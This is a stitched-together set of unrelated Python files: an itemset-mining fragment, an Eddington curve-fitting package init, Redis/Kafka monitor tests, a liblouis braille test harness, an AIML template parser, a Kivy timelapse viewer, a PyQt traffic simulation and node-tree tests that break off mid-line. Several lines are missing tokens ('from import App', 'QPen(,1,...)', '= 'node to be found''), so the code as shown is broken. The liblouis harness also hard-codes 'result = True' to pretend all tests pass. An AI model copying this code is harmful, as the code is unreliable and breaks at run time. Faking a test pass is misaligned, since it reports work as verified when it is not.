+= projectedTransaction.prefixUtility consecutiveMergeCount += 1 else: transactionsPe.append(previousTransaction) previousTransaction = projectedTransaction consecutiveMergeCount = 0 transaction.offset = positionE if previousTransaction != transactionsOfP[0]: transactionsPe.append(previousTransaction) self.temp[prefixLength] = self.newNamesToOldNames[e] if utilityPe >= self.minUtil: self.highUtilityItemsets.append((utilityPe , self.temp[:prefixLength + 1])) # caluclate the set which is intersection of all the neighbours of items present in P U {e} neighbourhoodList = self.caluclateNeighbourIntersection(prefixLength) # caluclate the local utility and subtree utility self.useUtilityBinArraysToCalculateUpperBounds(transactionsPe, idx, itemsToKeep, neighbourhoodList) newItemsToKeep = [] newItemsToExplore = [] for l in range(idx + 1, len(itemsToKeep)): itemk = itemsToKeep[l] if self.utilityBinArraySU[itemk] >= self.minUtil: if itemk in neighbourhoodList: newItemsToExplore.append(itemk) newItemsToKeep.append(itemk) elif self.utilityBinArrayLU[itemk] >= self.minUtil: if itemk in neighbourhoodList: newItemsToKeep.append(itemk) self.backtrackingEFIM(transactionsPe, newItemsToKeep, newItemsToExplore, prefixLength + 1) def intersection(self, lst1, lst2): # Use of hybrid method temp = set(lst2) lst3 = [value for value in lst1 if value in temp] return lst3 def caluclateNeighbourIntersection(self, prefixLength): intersectionList = [] if self.temp[0] in self.Neighbours: intersectionList = self.Neighbours[self.temp[0]] else: return intersectionList for i in range(1, prefixLength+1): if self.temp[i] in self.Neighbours: intersectionList = self.intersection(self.Neighbours[self.temp[i]], intersectionList) finalIntersectionList = [] for item in intersectionList: if item in self.oldNamesToNewNames: finalIntersectionList.append(self.oldNamesToNewNames[item]) return finalIntersectionList def useUtilityBinArraysToCalculateUpperBounds(self, transactionsPe, j, itemsToKeep, neighbourhoodList): for i in range(j + 1, len(itemsToKeep)): item = itemsToKeep[i] self.utilityBinArrayLU[item] = 0 self.utilityBinArraySU[item] = 0 for transaction in transactionsPe: length = len(transaction.getItems()) i = length - 1 while i >= transaction.offset: item = transaction.getItems()[i] if item in itemsToKeep: remainingUtility = 0 if self.newNamesToOldNames[item] in self.Neighbours: item_neighbours = self.Neighbours[self.newNamesToOldNames[item]] for k in range(i, length): transaction_item = transaction.getItems()[k] if self.newNamesToOldNames[transaction_item] in item_neighbours and transaction_item in neighbourhoodList: remainingUtility += transaction.getUtilities()[k] remainingUtility += transaction.getUtilities()[i] self.utilityBinArraySU[item] += remainingUtility + transaction.prefixUtility self.utilityBinArrayLU[item] += transaction.transactionUtility + transaction.prefixUtility i -= 1 def is_equal(self, transaction1, transaction2): length1 = len(transaction1.items) - transaction1.offset length2 = len(transaction2.items) - transaction2.offset if length1 != length2: return False position1 = transaction1.offset position2 = transaction2.offset while position1 < len(transaction1.items): if transaction1.items[position1] != transaction2.items[position2]: return False position1 += 1 position2 += 1 return True def sortDatabase(self, transactions): cmp_items = cmp_to_key(self.sort_transaction) transactions.sort(key=cmp_items) def sort_transaction(self, trans1, trans2): trans1_items = trans1.getItems() trans2_items = trans2.getItems() pos1 = len(trans1_items) - 1 pos2 = len(trans2_items) - 1 if len(trans1_items) < len(trans2_items): while pos1 >= 0: sub = trans2_items[pos2] - trans1_items[pos1] if sub != 0: return sub pos1 -= 1 pos2 -= 1 return -1 elif len(trans1_items) > len(trans2_items): while pos2 >= 0: sub = trans2_items[pos2] - trans1_items[pos1] if sub != 0: return sub pos1 -= 1 pos2 -= 1 return 1 else: while pos2 >= 0: sub = trans2_items[pos2] - trans1_items[pos1] if sub != 0: return sub pos1 -= 1 pos2 -= 1 return 0
"""Core functionalities of the Eddington platform.""" from eddington.exceptions import ( EddingtonException, FitDataColumnExistenceError, FitDataColumnIndexError, FitDataColumnsLengthError, FitDataError, FitDataInvalidFile, FitDataInvalidFileSyntax, FitFunctionLoadError, FitFunctionRuntimeError, ) from eddington.fit_data import FitData from eddington.fit_function_class import FitFunction, fit_function from eddington.fit_functions_registry import FitFunctionsRegistry from eddington.fit_result import FitResult from eddington.fit_functions_list import ( constant, exponential, hyperbolic, linear, parabolic, polynom, cos, sin, straight_power, inverse_power, ) from eddington.fitting import fit_to_data __all__ = [ # Fit functions infrastructure "FitFunction", "fit_function", "FitFunctionsRegistry", # Fit functions "constant", "exponential", "hyperbolic", "linear", "parabolic", "polynom", "cos", "sin", "straight_power", "inverse_power", # Fitting algorithm "fit_to_data", # Exceptions "EddingtonException", "FitFunctionRuntimeError", "FitFunctionLoadError", "FitDataError", "FitDataColumnExistenceError", "FitDataColumnIndexError", "FitDataInvalidFile", "FitDataColumnsLengthError", "FitDataInvalidFileSyntax", # Data structures "FitData", "FitResult", ]
<reponame>abael/ScrapyCluster<gh_stars>0 ''' Online integration tests ''' import unittest from unittest import TestCase from mock import MagicMock import sys from os import path sys.path.append(path.dirname(path.dirname(path.abspath(__file__)))) from redis_monitor import RedisMonitor from plugins.kafka_base_monitor import KafkaBaseMonitor from kafka import KafkaClient, SimpleConsumer import settings import redis import json class CustomMonitor(KafkaBaseMonitor): ''' Custom Monitor so we can run this test live without interference ''' regex = "info-test:*" def setup(self, settings): KafkaBaseMonitor.setup(self, settings) def handle(self, key, value): return_dict = { "info-test": value, "appid": "someapp" } self._send_to_kafka(return_dict) self.redis_conn.delete(key) class TestRedisMonitor(TestCase): maxDiff = None queue_key = "" def setUp(self): self.redis_monitor = RedisMonitor("") self.redis_monitor.settings = self.redis_monitor.wrapper.load("") self.redis_monitor.logger = MagicMock() self.redis_monitor.settings['KAFKA_TOPIC_PREFIX'] = "demo_test" self.redis_monitor.settings['STATS_TOTAL'] = False self.redis_monitor.settings['STATS_PLUGINS'] = False self.redis_monitor.settings['PLUGINS'] = { 'plugins.info_monitor.InfoMonitor': None, 'plugins.stop_monitor.StopMonitor': None, 'plugins.expire_monitor.ExpireMonitor': None, 'tests.tests_online.CustomMonitor': 100, } self.redis_monitor.redis_conn = redis.Redis( host=self.redis_monitor.settings['REDIS_HOST'], port=self.redis_monitor.settings['REDIS_PORT']) self.redis_monitor._load_plugins() self.redis_monitor.stats_dict = {} self.kafka_conn = KafkaClient(self.redis_monitor.settings[ 'KAFKA_HOSTS']) self.kafka_conn.ensure_topic_exists("demo_test.outbound_firehose") self.consumer = SimpleConsumer( self.kafka_conn, "demo-id", "demo_test.outbound_firehose" ) def test_process_item(self): # we only want to go to the end now, not after this test is ran, 2) # set the info flag key = "info-test:blah" value = "ABC123" self.redis_monitor.redis_conn.set(key, value) # process the request plugin = self.redis_monitor.plugins_dict.items()[0][1] self.redis_monitor._process_plugin(plugin) # ensure the key is gone self.assertEquals(self.redis_monitor.redis_conn.get(key), None) def test_sent_to_kafka(self): success = { u'info-test': "ABC123", u"appid": u"someapp" } # ensure it was sent out to kafka message_count = 0 for message in self.consumer.get_messages(): if message is None: break else: the_dict = json.loads(message.message.value) self.assertEquals(success, the_dict) message_count += 1 self.assertEquals(message_count, 1) if __name__ == '__main__': unittest.main()
#!/usr/bin/env python # -*- coding: utf-8 -*- # Liblouis test harness # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Library General Public # License as published by the Free Software Foundation; either # version 3 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Library General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., Franklin Street, Fifth Floor, # Boston MA 02110-1301 USA. # # Copyright (c) 2012, liblouis team, <NAME>. """Liblouis test harness: Please see the liblouis documentation for information of how to add a new harness or more tests for your braille table. @author: <NAME> <<EMAIL>> @author: <NAME> <<EMAIL>> @author: <NAME> <<EMAIL>> """ import json import os import sys import traceback from glob import iglob from louis import translate, backTranslateString, hyphenate from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl try: from nose.plugins import Plugin from nose import run except ImportError: sys.stderr.write("The harness tests require nose. Skipping...\n") sys.exit(0) ### Nosetest plugin for controlling the output format. ### class Reporter(Plugin): name = 'reporter' def __init__(self): super(Reporter, self).__init__() self.res = [] = None def setOutputStream(self, stream): # grab for own use = stream # return dummy stream class dummy: def write(self, *arg): pass def writeln(self, *arg): pass def flush(self): pass d = dummy() return d def addError(self, test, err): exctype, value, tb = err errMsg = ''.join(traceback.format_exception(exctype, value, tb)) self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg) def addFailure(self, test, err): exctype, value, tb = err #errMsg = ''.join(traceback.format_exception(exctype, value, None)) self.res.append("%s\n" % value) def finalize(self, result): failures=len(result.failures) errors=len(result.errors) total=result.testsRun percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else "" self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))"\n".join(self.res)) ### End of nosetest plugin for controlling the output format. ### PY2 = sys.version_info[0] == 2 def u(a): if PY2: return a.encode("utf-8") return a modes = { 'noContractions': noContractions, 'compbrlAtCursor': compbrlAtCursor, 'dotsIO': dotsIO, 'comp8Dots': comp8Dots, 'pass1Only': pass1Only, 'compbrlLeftCursor': compbrlLeftCursor, 'otherTrans': otherTrans, 'ucBrl': ucBrl } def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"): """A helper function to make a string to show the position of the given cursor.""" display = [" "] *length display[pos1] = marker1 if pos2: display[pos2] = marker2 return "".join(display) class BrailleTest(): def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]): self.harnessName = harnessName self.tables = tables if outputUniBrl: self.tables.insert(0, 'unicode.dis') self.input = input self.expectedOutput = output self.mode = mode if not mode else modes[mode] self.cursorPos = cursorPos self.expectedBrlCursorPos = brlCursorPos self.comment = comment self.testmode = testmode def __str__(self): return "%s" % self.harnessName def hyphenateword(self, tables, word, mode): # FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string. # medium/longterm this hack should be removed, and the root of the problem found/resolved. hyphen_mask=hyphenate(tables, word+' ', mode) # FIXME: why on python 2 do we need to remove the last item, and on python3 it is needed? # i.e. in python2 word and hyphen_mask not of the same length. if PY2: return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] ) else: return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) ) def check_translate(self): if self.cursorPos is not None: tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos) else: tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode) template = "%-25s '%s'" tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos) report = [ "--- Braille Difference Failure: %s ---" % self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("expected brl:", self.expectedOutput), template % ("actual brl:", tBrl), "--- end ---", ] assert tBrl == self.expectedOutput, u("\n".join(report)) def check_backtranslate(self): backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode) template = "%-25s '%s'" report = [ "--- Backtranslate failure: %s ---" % self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("expected text:", self.expectedOutput), template % ("actual backtranslated text:", backtranslate_output), "--- end ---", ] assert backtranslate_output == self.expectedOutput, u("\n".join(report)) def check_cursor(self): tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos) template = "%-25s '%s'" etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos) report = [ "--- Braille Cursor Difference Failure: %s ---" %self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("received brl:", tBrl), template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos), etBrlCurPosStr), "--- end ---" ] assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report)) def check_hyphenate(self): hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode) template = "%-25s '%s'" report = [ "--- Hyphenation failure: %s ---" % self.__str__(), template % ("input:", self.input), template % ("expected hyphenated word:", self.expectedOutput), template % ("actual hyphenated word:", hyphenated_word), "--- end ---", ] assert hyphenated_word == self.expectedOutput, u("\n".join(report)) def test_allCases(): if 'HARNESS_DIR' in os.environ: # we assume that if HARNESS_DIR is set that we are invoked from # the Makefile, i.e. all the paths to the Python test files and # the test tables are set correctly. harness_dir = os.environ['HARNESS_DIR'] else: # we are not invoked via the Makefile, i.e. we have to set up the # paths (LOUIS_TABLEPATH) manually. harness_dir = "." # make sure local test braille tables are found os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables' testfiles=[] if len(sys.argv)>1: # grab the test files from the arguments for test_file in sys.argv[1:]: testfiles.extend(iglob(os.path.join(harness_dir, test_file))) else: # Process all *_harness.txt files in the harness directory. testfiles=iglob(os.path.join(harness_dir, '*_harness.txt')) for harness in testfiles: f = open(harness, 'r') try: harnessModule = json.load(f, encoding="UTF-8") except ValueError as e: raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message)) f.close() tableList = [] if isinstance(harnessModule['tables'], list): tableList.extend(harnessModule['tables']) else: tableList.append(harnessModule['tables']) origflags = {'testmode':'translate'} for section in harnessModule['tests']: flags = origflags.copy() flags.update(section.get('flags', {})) for testData in section['data']: test = flags.copy() testTables = tableList[:] test.update(testData) bt = BrailleTest(harness, testTables, **test) if test['testmode'] == 'translate': yield bt.check_translate if 'cursorPos' in test: yield bt.check_cursor if test['testmode'] == 'backtranslate': yield bt.check_backtranslate if test['testmode'] == 'hyphenate': yield bt.check_hyphenate if __name__ == '__main__': result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__) # FIXME: Ideally the harness tests should return the result of the # tests. However since there is no way to mark a test as expected # failure ATM we would have to disable a whole file of tests. So, # for this release we will pretend all tests succeeded and will # add a @expected_test feature for the next release. See also # result = True sys.exit(0 if result else 1)
<filename>parlai/agents/programr/parser/template/nodes/ import xml.etree.ElementTree as ET # from parlai.agents.programr.utils.logging.ylogger import YLogger import parlai.utils.logging as logging from parlai.agents.programr.aiml_manager import AIMLManager aiml_manager = AIMLManager.get_instance() ###################################################################################################################### # class TemplateNode(object): def __init__(self): self._children = [] @property def children(self): return self._children def append(self, child): self._children.append(child) def dump(self, tabs, output_func, eol, verbose): self.output(tabs, output_func, eol, verbose) def output(self, tabs, output_func, eol, verbose): self.output_child(self, tabs, eol, output_func) def output_child(self, node, tabs, eol, output_func): for child in node.children: output_func(self, "{0}{1}{2}".format(tabs, child.to_string(), eol)) self.output_child(child, tabs + "\t", eol, output_func) def resolve_children_to_string(self, brain): words = [child.resolve(brain) for child in self._children] return aiml_manager.nlp.tokenizer.words_to_texts(words) def resolve(self, brain): try: resolved = self.resolve_children_to_string(brain) # YLogger.debug(brain, "[%s] resolved to [%s]", self.to_string(), resolved) logging.debug(f"{self.to_string()} resolved to {resolved}") return resolved except Exception as excep: # YLogger.exception(brain, "Failed to resolve", excep) logging.error(f"Failed to resolve {excep}") return "" def to_string(self): return "[NODE]" def to_xml(self, brain): return self.children_to_xml(brain) def xml_tree(self, brain): xml = "<template>" xml += self.children_to_xml(brain) xml += "</template>" return ET.fromstring(xml) def children_to_xml(self, brain): xml = "" first = True for child in self.children: if first is not True: xml += " " first = False xml += child.to_xml(brain) return xml def parse_text(self, graph, text): if text is not None: string = text.strip() if string: words = graph.aiml_parser.brain.nlp.tokenizer.texts_to_words(string) for word in words: if word is not None and word: word_class = graph.get_node_class_by_name('word') word_node = word_class(word.strip()) self.children.append(word_node) return True return False def get_text_from_element(self, element): text = element.text if text is not None: text = text.strip() return text return None def get_tail_from_element(self, element): text = element.tail if text is not None: text = text.strip() if text == "": return None return text return None def parse_template_node(self, graph, pattern): head_text = self.get_text_from_element(pattern) head_result = self.parse_text(graph, head_text) found_sub = False for sub_pattern in pattern: graph.parse_tag_expression(sub_pattern, self) tail_text = self.get_tail_from_element(sub_pattern) self.parse_text(graph, tail_text) found_sub = True if head_result is False and found_sub is False: if hasattr(pattern, '_end_line_number'): # YLogger.warning(self, "No context in template tag at [line(%d), column(%d)]", # pattern._end_line_number, # pattern._end_column_number) logging.warning(f"No context in template tag at [line({pattern._end_line_number}), column({pattern._end_line_number})]") else: # YLogger.warning(self, "No context in template tag") logging.warning("No context in template tag") ####################################################################################################### def add_default_star(self): return False def _parse_node(self, graph, expression): expression_text = self.parse_text(graph, self.get_text_from_element(expression)) expression_children = False for child in expression: graph.parse_tag_expression(child, self) self.parse_text(graph, self.get_tail_from_element(child)) expression_children = True if expression_text is False and expression_children is False: if self.add_default_star(): # YLogger.debug(self, "Node has no content (text or children), default to <star/>") logging.debug("Node has no content (text or children), default to <star/>") star_class = graph.get_node_class_by_name('star') star_node = star_class() self.append(star_node) ####################################################################################################### def parse_attrib_value_as_word_node(self, graph, expression, attrib_name): node = graph.get_base_node() name_node = graph.get_word_node(expression.attrib[attrib_name]) node.append(name_node) return node def parse_children_as_word_node(self, graph, child): node = graph.get_base_node() node.parse_text(graph, self.get_text_from_element(child)) for sub_child in child: graph.parse_tag_expression(sub_child, node) node.parse_text(graph, self.get_text_from_element(child)) return node def parse_expression(self, graph, expression): raise NotImplementedError("Never call this directly, call the subclass instead!")
''' File: Author: <NAME>. & <NAME>. Date: 06/04/19 Description: This viewer can be run on a RaspberryPI, and pulls timelapse photos from a webserver hosted by ''' from kivy.config import Config import timelapseshare as tls import PIL import _thread import time import os os.environ['KIVY_GL_BACKEND'] = 'gl' # FIXES A SEGFAULT ???? import urllib.request as urllib #Config.set('graphics', 'fullscreen','auto') Config.set('input', 'mouse', 'mouse,multitouch_on_demand') #Config.set('kivy', 'exit_on_escape', '1') from import App from kivy.core.window import Window from kivy.uix.screenmanager import ScreenManager, Screen, NoTransition from kivy.uix.label import Label from kivy.uix.image import Image from kivy.uix.boxlayout import BoxLayout from kivy.uix.gridlayout import GridLayout from kivy.uix.floatlayout import FloatLayout from kivy.uix.button import Button from import Rectangle, Color from kivy.clock import Clock # ========================== # Defaults # ========================== _SPEED = 1 _UPDATE_INTERVAL = 10 # every 10 seconds _CLEAR_CACHE = False _FILESERVER = "http://localhost:8000" # ========================== # Command-Line Arguments # ========================== import argparse import platform def dir_path(string): if os.path.isdir(string): return string else: raise parser = argparse.ArgumentParser(description="Interactive Timelapse scroller") parser.add_argument("-i", "--image_directory", type=dir_path, help="Sets the directory where the images are stored") parser.add_argument("-pre", "--image_prefix", type=str, help="Sets the prefix of the image Eg. 'IMG'") parser.add_argument("-post", "--image_postfix", type=str, help="Sets the postfix of the image Eg. '.jpg'") parser.add_argument("-url", "--server_url", type=str, help="Sets the link to the server hosted by the webcam") args = parser.parse_args() if args.image_directory: print("[*] SETTING IMAGE DIRECTORY : " + args.image_directory) tls.setImageDirectory(args.image_directory) if args.server_url: print("[*] SETTING URL TO SERVER : " + args.server_url) _FILESERVER = args.server_url # ========================== # Runtime Calculations # ========================== tls.updateStats() def getImageDateTime(ID): datafile = open(tls.getDataByID(ID)) teasis = datafile.close() return teasis print("Highest: %d\nLowest: %d" % (tls.getMax(), tls.getMin())) # ========================== # WebServer stuff # ========================== def update_imgs(min_i, max_i): global _CLEAR_CACHE if tls._MIN > min_i and _CLEAR_CACHE: for i in range(tls._MIN, min_i): # delete files in that range try: print("removing " + str(i)) os.remove(tls.getImageByID(i)) except: print(str(i) + " doesn't exist!") if tls._MAX < max_i: for i in range(tls._MAX, max_i): # gets files in that range try: print("retrieving " + str(i)) urllib.urlretrieve(_FILESERVER + "/frame" + str(i) + ".jpg", tls.getImageByID(i)) except: print(str(i) + " doesn't exist!") tls.updateStatsManually(min_i, max_i) def get_update(): try: urllib.urlretrieve(_FILESERVER + "/index.txt", "index.txt") indx = open("index.txt") lines = indx.readlines() mi = int(lines[0]) ma = int(lines[1]) update_imgs(mi, ma) return True except: print("server down!") return False # ========================== # Update thread # ========================== get_update() def update_loop(): global _UPDATE_INTERVAL while True: time.sleep(_UPDATE_INTERVAL) get_update() _thread.start_new_thread(update_loop, ()) # ========================== # User-Interface # ========================== class DebugScreen(Screen): def __init__(self, *args, **kwargs): super(DebugScreen, self).__init__(*args, **kwargs) self.index = tls._MIN master_layout = BoxLayout(orientation='vertical', size_hint=(1, 0.1)) self.title = Label(text='', font_size=80, size_hint=(1, 1)) master_layout.add_widget(self.title) background_container = FloatLayout() self.image = Image(source=tls.getImageByID(self.index), size_hint=(1, 0.9), nocache=True, allow_stretch=True) background_container.add_widget(self.image) background_container.add_widget(master_layout) self.add_widget(background_container) Clock.schedule_interval(self.updateScroll, 0.10) Clock.schedule_interval(self.TLS_update, 1) # Keyboard Input self._keyboard = Window.request_keyboard(self._keyboard_closed, self) self._keyboard.bind(on_key_down=self._on_keyboard_down, on_key_up=self._on_keyboard_up) self.leftKey = False self.rightKey = False self.leftCount = 0 self.rightCount = 0 self.velo = 0 # Keyboard callbacks def _keyboard_closed(self): self._keyboard.unbind(on_key_down=self._on_keyboard_down) self._keyboard = None def _on_keyboard_down(self, keyboard, keycode, text, modifiers): if keycode[1] == 'left': self.leftKey = True elif keycode[1] == 'right': self.rightKey = True return True def _on_keyboard_up(self, keyboard, keycode): if keycode[1] == 'left': self.leftKey = False elif keycode[1] == 'right': self.rightKey = False return True # Mouse callbacks def on_touch_down(self, touch): if touch.is_mouse_scrolling: if touch.button == 'scrolldown': if self.index > tls._MIN: self.index = self.index - _SPEED elif touch.button == 'scrollup': if self.index < tls._MAX: self.index = self.index + _SPEED GridLayout.on_touch_down(self, touch) def updateScroll(self, *args): app = App.get_running_app() if self.leftKey: if self.leftCount >= 4: self.velo = -4 else: self.velo = self.velo - 1 elif self.rightKey: if self.rightCount >= 4: self.velo = 4 else: self.velo = self.velo + 1 else: self.velo = 0 self.leftCount = 0 self.rightCount = 0 if (self.index+self.velo) > tls._MAX or (self.index+self.velo) < tls._MIN: if (self.index+self.velo) > tls._MAX: self.index = tls._MAX elif (self.index+self.velo) < tls._MIN: self.index = tls._MIN else: self.index = self.index+self.velo #print("moving : " + str(self.index)) try: self.title.text = tls.getTimeByID(self.index) self.image.source = tls.getImageByID(self.index) except: pass # Timelapse Share auto-updating stuff def TLS_update(self, *args): #tls.updateStats(); if self.index > tls._MAX: self.index = tls._MAX if self.index < tls._MIN: self.index = tls._MIN try: self.title.text = tls.getTimeByID(self.index) self.image.source = tls.getImageByID(self.index) except: pass class ScreenManagement(ScreenManager): def __init__(self, *args, **kwargs): super(ScreenManagement, self).__init__(*args, **kwargs) self.DBscreen = DebugScreen(name='scrollDebug') self.add_widget(self.DBscreen) self.current = 'scrollDebug' class MainApp(App): def build(self): self.manager = ScreenManagement(transition=NoTransition()) return(self.manager) # Start the app MainApp().run()
from PyQt5 import QtGui from PyQt5.QtWidgets import QApplication,QMainWindow, QWidget, QPushButton from PyQt5.QtGui import QPainter,QBrush, QPen from PyQt5.QtCore import Qt from PyQt5.QtCore import QTimer from PyQt5.QtGui import QTransform from PyQt5.QtCore import QPointF from CarMaintainer import CarMaintainer from Algorithm import Algorithm class Window(QMainWindow): STATE_OF_EMERGENCY=1 def __init__(self): super().__init__() timer = QTimer(self) timer.setInterval(20) # interval in ms timer.timeout.connect(self.update) timer.start(0) self.title= "Emergency Response System" self.left=100 self.width=500 self.height=500 #button = QPushButton('button', self) #button.move(0,0) #button.clicked.connect(self.on_click) CarMaintainer() Algorithm() self.InitWindow() def InitWindow(self): self.setWindowIcon(QtGui.QIcon('icon.png')) self.setWindowTitle(self.title) self.setGeometry(,self.left,self.width,self.height) def on_click(self): Window.STATE_OF_EMERGENCY=1 def paintEvent(self, e): painter= QPainter(self) reflecting_axis= QTransform(1,0,0,0,-1,0,250,250,1) #translating the coordinate system to the middle of the screen and reflecting it about x axis to make positive y cooredinates above x axis painter.setTransform(reflecting_axis) painter.setPen(QPen(,1,Qt.SolidLine)) painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern)) painter.drawEllipse(QPointF(0,0),250,250) #draw outer lane painter.setPen(QPen(Qt.yellow,5,Qt.DashLine)) painter.setBrush(QBrush(Qt.gray,Qt.SolidPattern)) painter.drawEllipse(QPointF(0,0),150,150) #draw inner lane painter.setPen(QPen(,2,Qt.SolidLine)) painter.setBrush(QBrush(,Qt.SolidPattern)) painter.drawEllipse(QPointF(0,0),50,50) #black centre # ------------------------------------------------------------------------------------------------------------- # Drawing lanes is complete. Now drawing cars painter.setBrush(QBrush(,Qt.SolidPattern)) counter=1 for point in Algorithm.run_algorithm(Window.STATE_OF_EMERGENCY): if counter==1: painter.drawEllipse(QPointF(point[0], point[1]),10,10) counter=-1 else: painter.drawEllipse(QPointF(point[0], point[1]),5,5) counter=1 for a_car in CarMaintainer.Inner_Car_List: if a_car.PSUEDO_CAR==False: painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS) painter.drawText(a_car.calculate_position(),str(a_car.CarNumber)) else: painter.setPen(QPen(,1,Qt.DashLine)) #new paint settings for Psuedo car painter.setBrush(QBrush(Qt.gray,Qt.NoBrush)) painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS) painter.drawText(a_car.calculate_position(),str(a_car.CarNumber)) painter.setPen(QPen(,2,Qt.SolidLine)) # restore paint settings after drawing a psuedo car painter.setBrush(QBrush(,Qt.SolidPattern)) for a_car in CarMaintainer.Outer_Car_List: if a_car.IS_AMBULANCE == False : painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS) painter.drawText(a_car.calculate_position(),str(a_car.CarNumber)) else: painter.setBrush(QBrush(,Qt.SolidPattern)) painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS) painter.drawText(a_car.calculate_position(),str(a_car.CarNumber)) painter.setBrush(QBrush(,Qt.SolidPattern)) for a_car in CarMaintainer.In_Transition_List: painter.setBrush(QBrush(Qt.yellow,Qt.SolidPattern)) painter.drawEllipse(a_car.calculate_position(),a_car.CAR_GUI_RADIUS,a_car.CAR_GUI_RADIUS) painter.drawText(a_car.calculate_position(),str(a_car.CarNumber)) painter.setBrush(QBrush(,Qt.SolidPattern)) painter.setPen(QPen(,1,Qt.SolidLine)) painter.setBrush(QBrush(,Qt.NoBrush)) painter.drawEllipse(QPointF(0,0),100,100) #draw constuction line on inner lane painter.drawEllipse(QPointF(0,0),200,200) #draw constuction line on outer lane painter.setPen(QPen(,1,Qt.SolidLine)) painter.setBrush(QBrush(,Qt.SolidPattern)) # painter.drawEllipse(QPointF(100,0),5,5) # painter.drawEllipse(QPointF(-100,0),5,5) # painter.drawEllipse(QPointF(0,-100),5,5) painter.drawEllipse(QPointF(0,0),10,10)
# -*- coding: utf-8 -*- from placidity.node import Node, TreeNode class TestNode(): def test_append_children_to_node(self): node1, node2 = Node(), Node() node1.children.append(node2) assert node1.children[0] == node2 assert node2.parents[0] == node1 def test_append_parents_to_node(self): node1, node2 = Node(), Node() node1.parents.append(node2) assert node1.parents[0] == node2 assert node2.children[0] == node1 def test_append_same_node_as_child_and_parent(self): node1, node2 = Node(), Node() node1.children.append(node2) node1.parents.append(node2) assert node1.children[0] == node2 assert node1.parents[0] == node2 assert node2.children[0] == node1 assert node2.parents[0] == node1 def test_append_same_node_as_child_multiple_times(self): node1, node2 = Node(), Node() node1.children.append(node2) node1.children.append(node2) node1.children.append(node2) assert node1.children[0] == node2 assert node2.parents[0] == node1 assert len(node1.children) == 1 assert len(node2.parents) == 1 def test_append_same_node_as_parent_multiple_times(self): node1, node2 = Node(), Node() node1.parents.append(node2) node1.parents.append(node2) node1.parents.append(node2) assert node1.parents[0] == node2 assert node2.children[0] == node1 assert len(node1.parents) == 1 assert len(node2.children) == 1 def test_multi_append(self): node1, node2, node3 = Node(), Node(), Node() node1.children.append(node2, node3) assert len(node1.children) == 2 assert node2 in node1.children assert node3 in node1.children def test_remove_child_node(self): node1, node2 = Node(), Node() node1.children.append(node2) node1.children.remove(node2) assert len(node1.children) == 0 assert len(node2.parents) == 0 def test_remove_parent_node(self): node1, node2 = Node(), Node() node1.parents.append(node2) node1.parents.remove(node2) assert len(node1.parents) == 0 assert len(node2.children) == 0 def test_remove_same_node_multiple_times(self): node1, node2 = Node(), Node() node1.parents.append(node2) node1.parents.remove(node2) node1.parents.remove(node2) node1.parents.remove(node2) assert len(node1.parents) == 0 assert len(node2.children) == 0 def test_multi_remove(self): node1, node2, node3 = Node(), Node(), Node() node1.children.append(node2, node3) node1.children.remove(node2, node3) assert len(node1.children) == 0 def test_find_immediate_child_node(self): node1, node2 = Node(), Node() = 'node to be found' node1.children.append(node2) assert node1.find_child(name='node to be found') == node2 def test_find_child_node_no_results(self): node1 = Node() assert node1.find_child(name='just some name') == None def test_find_child_node_from_node_tree(self): node1 = Node() node1a = Node() node1a1 = Node() node1a1.color = 'blue' node1a2 = Node() node1a2.value = 13 node1b = Node() node1b1 = Node() node1b1.find_me = True node1b1.color = 'blue' node1.children.append(node1a, node1b) node1a.children.append(node1a1, node1a2) node1b.children.append(node1b1) assert node1.find_child(value=13) == node1a2 assert node1.find_child(find_me=True) == node1b1 assert node1.find_child(color='blue') == [node1a1, node1b1] def test_find_immediate_parent_node(self): node1, node2 = Node(), Node() = 'node to be found' node1.parents.append(node2) assert node1.find_parent(name='node to be found') == node2 def test_find_parent_node_no_results(self): node1 = Node() assert node1.find_parent(name='just some name') == None def test_find_parent_node_from_node_tree(self): node1 = Node() node1a = Node() node1a1 = Node() node1a1.color 